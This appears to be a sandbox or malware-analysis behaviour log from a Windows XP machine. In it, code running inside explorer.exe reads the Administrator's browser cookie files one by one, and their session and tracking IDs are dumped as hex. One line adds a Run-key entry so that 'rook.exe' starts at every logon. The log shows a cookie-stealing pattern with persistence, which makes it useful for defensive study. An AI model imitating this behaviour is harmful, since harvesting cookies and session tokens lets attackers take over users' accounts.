File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 2633287879
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633290144
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633292635
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 2633292940
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633295008
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633297457
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Offset: none Length: 102 Value: 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 2633297763
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633299571
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633302021
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Offset: none Length: 101 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 2633302335
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633304143
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633306592
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Offset: none Length: 189 Value: 4D 55 49 44 0A 33 43 41 41 41 32 42 34 37 42 36 42 36 44 32 39 31 45 45 30 41 30 30 46 37 38 36 42 36 44 43 44 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 34 38 32 30 30 30 38 39 36 0A 33 30 33 33 38 33 39 39 0A 32 36 33 31 34 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 2633306896
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633308876
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633312528
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt Offset: none Length: 190 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A success or wait 2633312833
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633314651
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633326126
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Offset: none Length: 291 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 2633326435
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633330156
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633332610
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt Offset: none Length: 204 Value: 53 52 43 48 55 53 52 0A 41 55 54 4F 52 45 44 49 52 3D 30 26 47 45 4F 56 41 52 3D 26 44 4F 42 3D 32 30 31 31 30 35 32 33 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 success or wait 2633332916
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633334941
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633337382
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt Offset: none Length: 197 Value: 53 52 43 48 44 0A 4D 53 3D 32 30 36 30 34 38 36 26 44 3D 32 30 36 30 34 36 31 26 41 46 3D 4D 53 4E 30 30 35 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 34 37 32 38 35 34 39 31 32 0A 33 30 33 33 38 35 37 38 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 53 52 43 48 55 53 52 success or wait 2633337688
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633339674
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633340847
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt Offset: none Length: 208 Value: 53 52 4D 5F 41 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 success or wait 2633341152
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633344339
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633346636
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt Offset: none Length: 210 Value: 53 52 4D 5F 41 0A 31 42 45 32 35 42 38 39 31 36 39 43 36 37 32 38 32 46 33 39 35 39 33 32 31 32 39 43 36 37 44 41 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 31 32 39 37 37 35 36 38 30 30 0A 33 30 33 33 38 35 37 35 0A 32 35 39 33 31 34 33 35 38 34 0A 33 30 31 39 31 37 success or wait 2633346944
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633348954
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633352703
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Offset: none Length: 69 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633353199
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633354988
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633357460
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633358994
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633360901
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633363370
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 2633363676
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633365458
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633368027
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 30 34 38 36 32 32 30 38 0A 33 30 31 39 32 33 32 37 0A 32 36 31 35 30 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 2633368338
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633370105
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633403094
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Offset: none Length: 83 Value: 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633403409
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633405316
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633473325
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt Offset: none Length: 584 Value: 64 69 73 71 75 73 5F 75 6E 69 71 75 65 0A 39 37 38 37 38 38 39 36 33 38 38 30 0A 64 69 73 71 75 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 36 33 36 33 36 37 34 38 38 0A 33 30 32 36 35 31 34 37 0A 36 31 35 30 35 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 5F 5F 75 74 6D 61 0A 34 30 success or wait 2633473641
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633856165
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {1C9B46F7-F88B-AD7E-FB56-FD56EA1DDE44} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe" success or wait 2633859398
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633860118
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt Offset: none Length: 96 Value: 61 69 64 0A 43 33 66 64 61 36 36 35 63 31 31 31 31 30 37 31 38 34 37 36 37 36 33 32 35 35 36 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 37 30 34 36 36 33 31 36 38 0A 33 30 32 36 34 39 34 32 0A 32 34 35 30 32 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A 0A success or wait 2633860545
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633862351
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633867084
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt Offset: none Length: 88 Value: 61 69 64 0A 43 30 66 63 31 36 34 36 63 31 31 31 31 30 32 31 36 31 32 38 36 38 31 36 35 32 34 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 34 34 39 39 30 32 30 38 0A 33 30 32 36 34 39 35 32 0A 34 37 31 37 38 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A success or wait 2633867515
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633869406
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633875870
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Offset: none Length: 223 Value: 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 30 30 32 32 31 33 66 64 34 38 37 62 33 34 64 34 31 38 37 66 65 61 32 31 66 61 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 success or wait 2633876242
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633878228
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633882606
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt Offset: none Length: 137 Value: 65 78 70 72 63 0A 69 64 3D 32 33 30 36 39 62 63 36 65 36 32 31 34 61 30 32 61 33 64 64 36 30 32 65 34 35 36 66 36 36 36 39 26 62 64 3D 32 30 31 31 2D 31 32 2D 30 31 54 32 30 3A 31 37 3A 33 38 2E 38 34 39 26 76 3D 32 0A 65 78 70 2E 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 32 35 32 38 38 success or wait 2633882996
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633885943
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633891967
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Offset: none Length: 88 Value: 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 2633892510
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633894318
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633896616
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Offset: none Length: 99 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 2633897072
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633898787
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633900016
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Offset: none Length: 100 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 2633900382
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633906820
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633909317
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 2633909752
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633911562
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633914057
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 2633915709
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633917625
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633920123
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 2633920554
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633922369
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633924910
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Offset: none Length: 455 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 2633925428
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633928087
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633929238
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Offset: none Length: 387 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 2633929600
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633931355
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633933964
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Offset: none Length: 521 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 32 31 34 64 38 30 63 64 33 30 33 38 34 36 65 37 38 30 32 61 63 34 62 34 63 62 33 65 37 31 32 64 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 38 34 37 30 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 2633934329
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633937119
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633939609
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt Offset: none Length: 353 Value: 5F 5F 75 74 6D 61 0A 31 35 36 32 31 31 39 34 30 2E 31 31 32 32 33 35 34 36 33 34 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 0A 6F 6C 64 61 70 70 73 2E 63 6F 6D 2F 0A 31 36 30 30 0A 38 30 37 36 39 31 33 39 32 0A 33 30 33 33 38 35 37 33 0A success or wait 2633940043
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633942280
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633944777
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt Offset: none Length: 98 Value: 6D 63 0A 34 65 64 37 65 63 30 38 2D 39 39 31 31 62 2D 34 37 35 33 38 2D 61 33 39 37 39 0A 71 75 61 6E 74 73 65 72 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 39 39 38 34 32 38 31 36 0A 33 30 35 35 39 32 35 34 0A 36 38 34 35 38 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A success or wait 2633945207
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633947117
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633949620
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt Offset: none Length: 160 Value: 6C 69 6E 6B 6A 75 6D 70 74 65 73 74 0A 31 0A 71 75 65 73 74 69 6F 6E 6D 61 72 6B 65 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 30 36 30 35 33 34 31 34 34 0A 33 30 31 39 31 37 33 36 0A 34 37 30 36 31 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 4C 50 0A 31 33 32 32 37 37 34 37 38 30 0A 71 75 65 73 74 success or wait 2633950050
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633953224
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633954425
